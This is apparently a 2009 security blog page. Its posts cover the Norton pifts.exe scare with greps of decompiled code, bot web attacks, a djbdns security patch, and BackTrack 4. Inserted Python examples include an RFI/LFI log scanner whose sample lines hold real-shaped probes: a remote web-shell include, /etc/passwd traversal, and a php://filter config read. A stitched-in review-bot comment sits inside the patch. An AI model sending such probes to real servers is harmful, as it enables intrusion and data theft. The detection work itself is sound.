Conspiracy theories fly around Norton forum ‘Pifts’ purge

Conspiracy theories are running rampant in the absence of a clear explanation of why Symantec deleted threads expressing concern about a file called pifts.exe from its Norton support forums.

Many users running Norton Internet Protection began seeing a popup warning on Monday that a file called PIFTS.exe on their systems was trying to access the internet. The location of the file was given as a non-existent folder buried inside the Symantec LiveUpdate folder.

The appearance of a file in a non-existent folder suggests rootkit-like behaviour. PIFTS.exe attempts to contact a server in Africa, which has been traced to Symantec.

Concerned punters started posting on Norton’s support forums, asking what was going on. That’s all normal enough, but then discussions on the subject were deleted without explanation from Norton’s community pages. Follow-up threads mentioning the issue were deleted even more quickly.

source

Symantec creates havoc with unsigned Norton patch

Symantec released a diagnostic patch for some of its older Norton products on Monday night that did not identify its origin and thus triggered alerts on user firewalls, the company said Tuesday.

The patch for 2006 and 2007 versions of Norton Internet Security and Norton Antivirus, a program dubbed “PFST.exe,” (Product Information Framework Trouble Shooter) was distributed to collect anonymous statistics on matters such as how many computers are using the products and what operating system they are running, Jeff Kyle, group product manager for Symantec consumer products, said Tuesday.

Because it was unsigned, a result of human error, firewalls started prompting users with messages asking them if they trust the patch, Kyle said. Of course, because the patch had no signature indicating it was from Symantec, users didn’t know whether to trust it and many of them went to the Norton user forum for answers.

The company pulled the patch after three hours and then unwittingly laid the groundwork for conspiracy theorists after it started deleting forum posts related to the matter. The company was not censoring the posts, but fighting off a spam attack, according to Kyle.

“At the same time we were pulling down the patch a spammer created a new account on our forum and minutes after that there were 200 new users all targeting the same thread,” he said. “Within the first hour there were like 600 posts to that thread. Obviously it was a bot creating this.”

The posts were written with poor grammar and broken English and some were vulgar and nonsensical. It is possible, though, that Symantec could have inadvertently deleted some legitimate posts while it was purging the spam, Kyle said.

“There is no conspiracy theory. There’s nothing we are hiding at all,” Kyle added.

Meanwhile, Kyle said he isn’t sure whether or when Symantec will redistribute the patch, but if they do, he said, it will be signed.

Symantec has more information on its message board site. The Washington Post reported that hackers were exploiting the situation and had managed to get malicious Web sites into top Google search results for “pifts.exe.”

source

Digg in:

http://chrysler5thavenue.blogspot.com/2009/03/piftsexe.html

http://www.abovetopsecret.com/forum/thread444230/pg1

http://blogs.howstuffworks.com/2009/03/10/what-is-piftsexe/

http://www.theregister.co.uk/2009/03/10/norton_pifts_mystery/

http://news.cnet.com/8301-1009_3-10192899-83.html?part=rss&subj=news&tag=2547-1_3-0-20

http://isc.sans.org/diary.html?storyid=5992

http://it.slashdot.org/article.pl?sid=09/03/10/139229

http://www.tech-linkblog.com/2009/03/conspiracy-theories-run-rampant-due-to-piftsexe.html/

http://voices.washingtonpost.com/securityfix/2009/03/symantec_users_complain_of_mys.html

http://community.norton.com/norton/board/message?board.id=nis_feedback&thread.id=39119

http://www.virustotal.com/analisis/734465e30a6ee6d6c493471d77940f4c

http://www.threatexpert.com/report.aspx?md5=91b564d825a3487ae5b5fafe57260810

http://www.mediafire.com/download.php?iotyqjbrmry – pifts.exe asm code from IDA and C-like decompiled pseudocode from HexRays Decompiler

The disassembly of the binary doesn’t look out of the ordinary, and after a quick look at the PIFTS.c decompiled code in the above archive it seems that Symantec is telling nothing but the truth.

Snips:

$ cat PIFTS.c | grep -i RegOpenKey
// LSTATUS __stdcall RegOpenKeyExW(HKEY hKey, LPCWSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult); idb
v1 = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey);
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
&& (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)

$ cat PIFTS.c | grep -i http
extern wchar_t aHttpStats_nort[40]; // weak
sub_402210((int)L"http://stats.norton.com/n/p?module=2667", (int)&lpszUrl);

$ cat PIFTS.c | grep -i symantec
v1 = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey);
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
&& (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
L"SOFTWARE\\Symantec\\PIF\\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\\PifEngine",
L"SOFTWARE\\Symantec\\PIF\\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\\HbEngine",
L"SOFTWARE\\Symantec\\PIF\\{96E26A03-A25A-400b-B9B4-564C9BD00F46}",
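The greps above are the quick-look version of the triage most of us do on an unknown binary: is it signed, what does it talk to, and what does it touch? The script below is an added example (mine, not code from the archive linked above or from Symantec) that does that first pass over raw bytes rather than over Hex-Rays output, so it also catches the UTF-16LE strings that a plain `strings` run misses. The data blob is constructed to resemble the L"..." literals shown above; it is not pifts.exe, and the PE header builder exists only so the signature check has something to run against. Checking the security data directory tells you whether a file carries an Authenticode signature at all, which is exactly what the unsigned PIFTS.exe lacked; verifying the chain is a separate step (signtool or Get-AuthenticodeSignature).

```python
import re
import struct

# Constructed sample blob (NOT pifts.exe): bytes laid out the way a Windows
# binary's data looks, with UTF-16LE strings like the L"..." literals in the
# grep output above, plus an ASCII import name and some filler.
SAMPLE_BLOB = (
    b"\x00" * 16
    + "Software\\Symantec\\InstalledApps".encode("utf-16-le") + b"\x00\x00"
    + b"\x90\x90\xcc\xcc"
    + "http://stats.norton.com/n/p?module=2667".encode("utf-16-le") + b"\x00\x00"
    + b"RegOpenKeyExW\x00"
    + b"\x01\x02\x03"
    + "SOFTWARE\\Symantec\\PIF\\PifEngine".encode("utf-16-le") + b"\x00\x00"
)

ASCII_RE = re.compile(rb"[\x20-\x7e]{6,}")
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")   # UTF-16LE printable runs
URL_RE = re.compile(r"^(?:https?|ftp)://([^/\s]+)", re.I)
REG_RE = re.compile(r"^(?:HKEY_[A-Z_]+\\|SOFTWARE\\)", re.I)
API_RE = re.compile(r"[A-Z][A-Za-z0-9]*[AW]")        # Win32 names ending in A/W


def extract_strings(blob):
    """Return (kind, text) pairs for ASCII and UTF-16LE runs of 6+ printable
    chars. The wide strings are where the registry paths and the stats URL
    live in a program like this one."""
    found = [("ascii", m.group().decode("ascii")) for m in ASCII_RE.finditer(blob)]
    found += [("wide", m.group().decode("utf-16-le")) for m in WIDE_RE.finditer(blob)]
    return found


def triage(strings):
    """Bucket extracted strings into the things a quick look cares about."""
    report = {"urls": [], "hosts": [], "registry": [], "apis": []}
    for _, s in strings:
        m = URL_RE.match(s)
        if m:
            report["urls"].append(s)
            report["hosts"].append(m.group(1).lower())
        elif REG_RE.match(s):
            report["registry"].append(s)
        elif API_RE.fullmatch(s):
            report["apis"].append(s)
    return report


def build_pe(signed):
    """Constructed minimal PE32 header (no sections): just enough for the
    signature-presence check below, not a loadable image."""
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    if signed:
        # IMAGE_DIRECTORY_ENTRY_SECURITY is index 4; the data directories
        # begin at optional-header offset 96 for PE32 (112 for PE32+).
        struct.pack_into("<II", opt, 96 + 4 * 8, 0x2000, 0x1800)
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, len(opt), 0x102)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))           # e_lfanew
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def carries_authenticode(pe):
    """True if the security data directory is populated, i.e. the file
    carries an Authenticode blob at all. Whether that signature actually
    verifies (chain, hash, timestamp) is a separate question."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad NT header signature")
    opt_off = e_lfanew + 4 + 20                           # past 'PE\0\0' + COFF header
    magic = struct.unpack_from("<H", pe, opt_off)[0]
    dir_off = opt_off + (96 if magic == 0x10B else 112)
    rva, size = struct.unpack_from("<II", pe, dir_off + 4 * 8)
    return rva != 0 and size != 0


def quick_look(pe_bytes, data_bytes):
    """The whole first pass: is it signed, and what does it talk to / touch?"""
    report = triage(extract_strings(data_bytes))
    report["signed"] = carries_authenticode(pe_bytes)
    return report


if __name__ == "__main__":
    for signed in (False, True):
        print(quick_look(build_pe(signed), SAMPLE_BLOB))
```

On a real sample you would feed the whole file to `extract_strings` and the same bytes to `carries_authenticode`; the two are split here only so the constructed blob can stay small.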

For me it doesn’t sound like much of a conspiracy or an uber slick big brother spyware, because Symantec’s explanation of pifts.exe is somewhat reasonable, although the method they used to get the stats is questionable and unprofessional (don’t they have test systems, labs or networks? why push stuff that should be tested in the “development labs” to clients? clients are not a testing platform), and Symantec removing forum posts when they look like this doesn’t bother me either. The people who started this fire are the ones who don’t have the skills to reverse engineer an executable, because if they did they would know that there isn’t really anything interesting in the pifts code. Another reason for this might be this one too:

Finally, it has also been reported by the Washington Post that hackers are taking advantage of this situation. “Some of the top searches (currently the 3rd and 4th result in a Google search) are Web sites that try to install malicious software when you visit them.” When searching for information on “pifts.exe,” Symantec strongly advises all users to be wary of following links to unknown sites as malicious users are attempting to use this hot topic to distribute malware.

It is hard to believe that this was a planned scam, because you would really have to be a con mastermind to think of it beforehand and wait for the right moment, spot the appropriate moment (Symantec’s unsigned and questionable pifts.exe push update), prepare (create bogus trap websites/pages related to the subject and embed exploit and malware code), fire the scam (make people believe your conspiracy theory: the Symantec forums, the stories, the blog posts) and then watch your botnet(s) grow. As written above, it is more probable that the bad guys saw the opportunity after the hype had been created and started to take advantage of it.

Tagged with:
 

Well, if you have the luck to get a high PageRank and really show up a lot in Google searches, then you automatically get this free gift. Those are HTTP download stats, or better called HTTP GET requests issued to the server, and you should not confuse that page with hack attempts. Do you see the immense amount of bot web attacks, mostly RFI and LFI? Well, I’ve seen some of that as soon as Google indexed my site and started showing it in searches. The conclusion is, if you don’t know this already: if you want to have your own server under your administration, you’d better have the necessary skills to secure it, because if you don’t, then your website and/or server won’t stand up for too long before getting pwned.
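To make the RFI/LFI point concrete, here is an added example (not the author’s own tooling) that runs a few constructed Apache combined-format lines through a small classifier. The log lines, the RFC 5737 documentation addresses in them and the probe patterns are my assumptions; the detection itself is the usual approach of URL-decoding each query value (twice, because scanners double-encode) and looking for remote URLs, traversal sequences and PHP stream wrappers.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote

# Constructed Apache combined-format lines (not the author's real logs);
# RFC 5737 documentation addresses stand in for the real sources.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2009:14:02:11 +0000] "GET /index.php?page=http://203.0.113.9/r57.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
198.51.100.7 - - [10/Mar/2009:14:02:12 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
192.0.2.44 - - [10/Mar/2009:14:03:01 +0000] "GET /2009/03/piftsexe/ HTTP/1.1" 200 8213 "http://www.google.com/search?q=pifts.exe" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2009:14:04:40 +0000] "GET /gallery/view.php?f=php://filter/convert.base64-encode/resource=../config.php HTTP/1.1" 200 1290 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)            # RFI: include a remote file
WRAPPER_RE = re.compile(r"^(?:php|file|expect|phar|zip)://|^data:", re.I)  # PHP stream wrappers


def classify_value(value):
    """Classify one query value as 'rfi', 'lfi' or None.
    parse_qsl already decoded it once; decode again for double-encoded probes."""
    v = unquote(value)
    if REMOTE_RE.match(v):
        return "rfi"
    if "../" in v or "..\\" in v or "/etc/passwd" in v or WRAPPER_RE.match(v):
        return "lfi"
    return None


def classify_request(target):
    """Return (kind, parameter) for a request target, or (None, None)."""
    path, _, query = target.partition("?")
    if "../" in unquote(unquote(path)):          # traversal in the path itself
        return "lfi", None
    for name, value in parse_qsl(query, keep_blank_values=True):
        kind = classify_value(value)
        if kind:
            return kind, name
    return None, None


def scan_log(text):
    """Parse combined-format lines and return the requests that look like
    file-inclusion probes, with who sent them and what they asked for."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                             # malformed line: skip, don't crash the scan
        kind, param = classify_request(m["target"])
        if kind:
            hits.append({"ip": m["ip"], "kind": kind, "param": param,
                         "target": m["target"], "status": int(m["status"]),
                         "ua": m["ua"]})
    return hits


def top_sources(hits):
    """Count probes per source address, the list you'd feed to a blocklist."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["kind"], h["status"], h["target"])
    print(top_sources(found))
```

A 404 on the probe (the first two lines) means the bot missed; the 200 on the wrapper request is the one to look at first, because it means the script exists and answered.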

Tagged with:
 

Djbdns bug finder awarded $1000

From: D. J. Bernstein <djb <at> cr.yp.to>
Subject: djbdns<=1.05 lets AXFRed subdomains overwrite domains
Newsgroups: gmane.network.djbdns
Date: 2009-03-04 01:34:21 GMT

If the administrator of example.com publishes the example.com DNS data
through tinydns and axfrdns, and includes data for sub.example.com
transferred from an untrusted third party, then that third party can
control cache entries for example.com, not just sub.example.com. This is
the result of a bug in djbdns pointed out by Matthew Dempsky. (In short,
axfrdns compresses some outgoing DNS packets incorrectly.)

Even though this bug affects very few users, it is a violation of the
expected security policy in a reasonable situation, so it is a security
hole in djbdns. Third-party DNS service is discouraged in the djbdns
documentation but is nevertheless supported. Dempsky is hereby awarded
$1000.

The next release of djbdns will be backed by a new security guarantee.
In the meantime, if any users are in the situation described above,
those users are advised to apply Dempsky's patch and requested to accept
my apologies. The patch is also recommended for other users; it corrects
the bug without any side effects. A copy of the patch appears below.

---D. J. Bernstein
   Research Professor, Computer Science, University of Illinois at Chicago

--- response.c.orig     2009-02-24 21:04:06.000000000 -0800
+++ response.c  2009-02-24 21:04:25.000000000 -0800
@@ -34,7 +34,7 @@
         uint16_pack_big(buf,49152 + name_ptr[i]);
         return response_addbytes(buf,2);
       }
-    if (dlen <= 128)
+    if ((dlen <= 128) && (response_len < 16384))
       if (name_num < NAMES) {
        byte_copy(name[name_num],dlen,d);
        name_ptr[name_num] = response_len;
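Review bot: the new guard `(response_len < 16384)` hard-codes the 14-bit limit of a DNS compression pointer as a bare number; the reason for it is the packing two lines above, `uint16_pack_big(buf,49152 + name_ptr[i]);`, where 49152 is 0xC000 and the remaining 14 bits carry the offset, so a remembered offset of 16384 or more would spill into the flag bits and emit a wrong pointer. Give the limit a named constant or a one-line comment tying it to that packing, and note next to it that names already recorded at offsets below 16384 stay valid targets after the response grows past that size, which is why only the recording (`name_ptr[name_num] = response_len`) needs the check and the pointer-emission path does not.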
source
djbdns
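The packing line in the hunk, 49152 + name_ptr[i], is the whole story: a compression pointer has two flag bits and a 14-bit offset, so an offset of 16384 or more cannot be expressed. The toy below is an added example (mine, not djbdns code) that reproduces that behaviour in Python with the guard from the patch switchable, so you can see the difference; the record layout, the filler used to grow the packet and the NAMES cap value are assumptions for the demonstration. In the unguarded build the second reference packs 0xC000 + 0x4000 into 16 bits as 0x0000, which a reader parses as the root label, so the name silently collapses; with the guard, names past the limit are simply written out in full.

```python
import struct

PTR_FLAG = 0xC000   # 49152: top two bits of a 16-bit word mark a compression pointer
PTR_LIMIT = 16384   # 2**14: the largest offset the remaining 14 bits can carry
NAMES = 100         # cap on remembered names; assumed value, stands in for the NAMES check


def encode_labels(name):
    """'sub.example.com' -> b'\\x03sub\\x07example\\x03com\\x00' (uncompressed wire form)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


class Response:
    """Toy response builder with suffix compression, shaped like the hunk above."""

    def __init__(self, guard):
        self.buf = bytearray()
        self.names = {}      # encoded suffix -> offset at which it was written
        self.guard = guard   # True: apply the `response_len < 16384` check

    def add_name(self, name):
        start = len(self.buf)
        d = encode_labels(name)
        while d != b"\x00":
            if d in self.names:
                # Suffix already in the packet: emit a 2-byte pointer to it.
                # The & 0xFFFF models uint16_pack_big silently dropping high bits.
                self.buf += struct.pack(">H", (PTR_FLAG + self.names[d]) & 0xFFFF)
                return start
            if len(d) <= 128 and (not self.guard or len(self.buf) < PTR_LIMIT):
                if len(self.names) < NAMES:
                    self.names[d] = len(self.buf)   # remember this suffix for later
            n = d[0]
            self.buf += d[:1 + n]                   # write one label, move to next suffix
            d = d[1 + n:]
        self.buf += b"\x00"
        return start

    def add_filler(self, nbytes):
        """Stand-in for other records that make the packet large."""
        self.buf += b"\x00" * nbytes


def decode_name(buf, off, max_hops=16):
    """Read a (possibly compressed) name back from the packet."""
    labels, hops = [], 0
    while True:
        n = buf[off]
        if n & 0xC0 == 0xC0:
            off = struct.unpack_from(">H", buf, off)[0] & 0x3FFF
            hops += 1
            if hops > max_hops:
                raise ValueError("compression pointer loop")
            continue
        if n == 0:
            return ".".join(labels)
        labels.append(buf[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n


def demo(guard):
    """Write sub.example.com twice after the packet has grown to 16 KiB."""
    r = Response(guard)
    r.add_name("example.com")                # offset 0: 'example.com' and 'com'
    r.add_filler(PTR_LIMIT - len(r.buf))     # are remembered at small offsets
    first = r.add_name("sub.example.com")    # written starting at offset 16384
    second = r.add_name("sub.example.com")   # unguarded: a pointer to offset 16384
    return decode_name(r.buf, first), decode_name(r.buf, second)


if __name__ == "__main__":
    print("without guard:", demo(False))
    print("with guard:   ", demo(True))
```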
Tagged with:
 

Security fail

[image: fail-owned-anti-theft-fail]

I couldn’t help thinking about the stunning resemblance of this image to the Internet security mentality and practices of nowadays.

Tagged with:
 

Read this fine analysis of the Raidon Staray-S Series hardware-encrypted HDDs on Heise Security:

Budget encryption – Attacking a weak crypto system

So next time, think again, read about it and investigate it before buying such an HDD and trusting it with your most precious data.

Tagged with:
 

BackTrack 4 beta released

[image: bt4_logo]

http://remote-exploit.org/backtrack_download.html ^^

You can read more about the release here.

( have mercy on the webserver :lol: )

Tagged with: